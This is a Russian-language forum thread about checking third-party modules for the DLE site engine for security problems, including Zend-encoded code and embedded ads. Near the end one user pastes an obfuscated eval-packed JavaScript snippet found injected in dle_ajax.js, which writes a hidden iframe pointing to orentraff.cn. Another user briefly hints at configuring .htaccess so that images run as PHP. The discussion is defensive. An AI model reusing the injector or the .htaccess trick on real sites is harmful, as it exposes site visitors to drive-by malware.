Моды: безопасность

[daykkin 0]

я это понял спустя пол часа) и занялся модулями)

[lifestar 18]

Проверять null - это бред

отчасти согласен. Времени на проверку ворованной версии вы потратите примерно столько же, за сколько могли бы заработать необходимую сумму на покупку лицензии

[Rokki 0]

Что делать если исхдный код закрыт Зендом? - да собственно ничего, ставить мод (плагин) на собственный страх и риск.

Как что в сети полно дезендов и все легко дезендится

[lifestar 18]

Rokki, статья направлена в первую очередь для неискушённых пользователей

[Fillosoff 1]

lifestar, и вообще, все ребята. спасибо! оч необходимая тема.

у меня самого установлено только несколько хаков и 1 модуль. но собираюсь еще как минимум парочку поставить. и вообще-то внимательно проверяю. что ставлю. но так как более-менее силен только в html и css , то вычищал из них только все ссылки, e-malеs. хых, есть один чел, пишущий модули и хаки (не буду называть) так у него на 100% кода 75% рекламы. безобидно, но все же..))

буду использовать ваше руководство и по-тихоньку расширять свою "карту мира"))

[kosen 3]

Kot Da Vinci - Fillosoff,

Имя брат... имя...

[IT-Security 33]

Это точно не я

Я код аккуратно пишу и без рекламы =)

Только комментарии в самом начале скрипта если вдруг хозяин сайта со мной контакт потеряет =)

[lifestar 18]

Kot Da Vinci - Fillosoff, ты про Хаммера? Если да, то у него это считается не рекламой, а копирайтами

[Fillosoff 1]

lifestar, не пойду с тобой в разведку!!

и мой совет тебе, не зови Хамера Хаммером, он обижается очень

[WMDrakon 20]

Kot Da Vinci - Fillosoff,

пораднились?

Я к сожалению, не помню история с Хамером, но кажись там было что то не чисто

P.S. Все, хватит флудить не по теме.

[BlackM 0]

lifestar как прошли твои эксперименты с картинками?)

[lifestar 18]

BlackMaster, если честно - не проводил. Стало вдруг резко некогда, проведу через неделю-две

[BlackM 0]

) главное в .htaccess не забудь поставить что картинка обрабатывалась как php)

[dedugan 0]

Да, это очень поучительная тема. Я конечно тоже стараюсь проверять, но...

У меня непонятный чужой код как-то просочился в четыре файла папки /ajax при чем в "родные" файлы, типа dle_ajax.js с java скриптами.

Причиной проверки стало недавнее появление "чужой" ссылки в начале загрузки сайта.

Найти-то я нашел, но вот как они туда попали, неизвестно пока... Из сторонних модулей стоит только Arcade (мод игр), да блока OnLine. Но я эти модуль и блок использую достаточно давно и раньше ничего не было..

Java scrits в общем-то довольно стремная вещь сама по себе... Пока мыслей нет, ищу.

[lifestar 18]

непонятный чужой код как-то просочился в четыре файла

интересно посмотреть на код

ava scrits в общем-то довольно стремная вещь сама по себе

а мне язык ява скрипт очень даже нравится =)

[dedugan 0]

интересно посмотреть на код

а мне язык ява скрипт очень даже нравится =)

Мне тоже нравится ява, но она довольно опасная штучка

Кусочек "чужого" кода такой (это только в файлах .js, но есть еще и в .php):

eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('d.f("<1 6=\'7://5.4/2.3?8\' 9=\'0\' e=\'0\' c=\'a:b\'></1>");',16,16,'|iframe|in|cgi|cn|orentraff|src|http||width|display|none|style|document|heig

ht|write'.split('|'),0,{}))

в итоге в начале загрузки страницы идет ссылка orentraff.cn....